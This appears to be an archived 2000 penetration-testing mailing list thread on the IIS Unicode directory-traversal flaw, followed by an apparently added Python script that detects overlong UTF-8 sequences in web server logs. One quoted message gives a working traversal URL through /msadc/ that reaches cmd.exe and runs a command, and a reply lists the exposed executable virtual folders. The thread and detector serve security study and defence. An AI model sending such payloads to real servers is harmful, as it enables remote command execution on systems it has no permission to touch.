Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings


From: Daniel Docekal <ddoc () MIA CZ>
Date: Mon, 30 Oct 2000 22:24:45 +0100

Talking about W2K, there are MANY virtual folders located on the system drive.

IISHELP (scripts only)
IISADMIN (scripts only)
MSADC (scripts and executables)  <--- this is a problem
_vti_bin (scripts and executables) <--- another problem
PRINTERS (scripts only)

In case Site Server is installed:

SiteServer (scripts only)
Sites (scripts only)
_mem_bin (scripts and executables) <--- another problem
FpSample (scripts only)
CmSample (scripts only)

So, frankly said, we will always have Paris :)

-----Original Message-----
From: Michael Owen [mailto:mowen () COSTCO COM]
Sent: Monday, October 30, 2000 8:23 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings


In our test, the InetPub directory is in logical drive D: instead of default C:.
Does that matter in the above examples?
-------------------------------------


In our internal tests, it does, and the exploit won't work. BUT, if you use
the /msadc/ virtual folder, it won't matter, as msadc is in
c:\program files\Common\....


http://iisbox/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\\temp






----------------------------------
Michael Owen
Costco Wholesale
Network Security
(425) 313-2957
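
For defenders reviewing web server logs for the kind of request quoted in this thread, the sketch below flags overlong UTF-8 sequences such as %e0%80%af (which decodes to "/") and notes whether the request targets one of the virtual folders listed above as "scripts and executables". It is an added example, not part of the original posts; the log layout, the field position and the sample lines are constructed assumptions, and it generalizes to any overlong 2- or 3-byte form.

```python
from urllib.parse import unquote_to_bytes

# Virtual folders the post marks "scripts and executables".
EXEC_VDIRS = {"msadc", "_vti_bin", "_mem_bin"}

# Constructed sample lines; assumed layout: date time client method raw-URI status.
SAMPLE_LOG = [
    "2000-10-30 21:10:02 192.0.2.10 GET /iishelp/iis/misc/default.asp 200",
    "2000-10-30 21:10:07 192.0.2.10 GET /msadc/..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe 200",
    "2000-10-30 21:10:09 192.0.2.10 GET /docs/caf%c3%a9.htm 200",  # legitimate UTF-8
]

def _cont(b):
    return b & 0xC0 == 0x80  # UTF-8 continuation byte, 10xxxxxx

def overlong_sequences(raw):
    """Return (offset, sequence, decoded char) for each overlong 2- or 3-byte form."""
    hits, i = [], 0
    while i < len(raw):
        s2, s3 = raw[i:i + 2], raw[i:i + 3]
        if len(s2) == 2 and s2[0] in (0xC0, 0xC1) and _cont(s2[1]):
            # 2-byte form carrying a value that fits in 7 bits
            hits.append((i, s2, chr(((s2[0] & 0x1F) << 6) | (s2[1] & 0x3F))))
            i += 2
        elif len(s3) == 3 and s3[0] == 0xE0 and 0x80 <= s3[1] <= 0x9F and _cont(s3[2]):
            # 3-byte form carrying a value that fits in 11 bits
            hits.append((i, s3, chr(((s3[1] & 0x3F) << 6) | (s3[2] & 0x3F))))
            i += 3
        else:
            i += 1
    return hits

def inspect_uri(uri):
    """Return a finding for a raw (still percent-encoded) URI, or None if clean."""
    path = uri.split("?", 1)[0]
    hits = overlong_sequences(unquote_to_bytes(path))
    if not hits:
        return None
    vdir = path.lstrip("/").split("/", 1)[0].lower()
    return {"vdir": vdir, "exec_vdir": vdir in EXEC_VDIRS,
            "decoded": "".join(ch for _, _, ch in hits)}

def scan(lines, uri_field=4):
    """Return (line index, finding) for every line whose URI is flagged."""
    results = ((n, inspect_uri(line.split()[uri_field])) for n, line in enumerate(lines))
    return [(n, finding) for n, finding in results if finding]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

Well-formed UTF-8 never uses these byte patterns, so any hit is worth reviewing regardless of which folder was requested.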


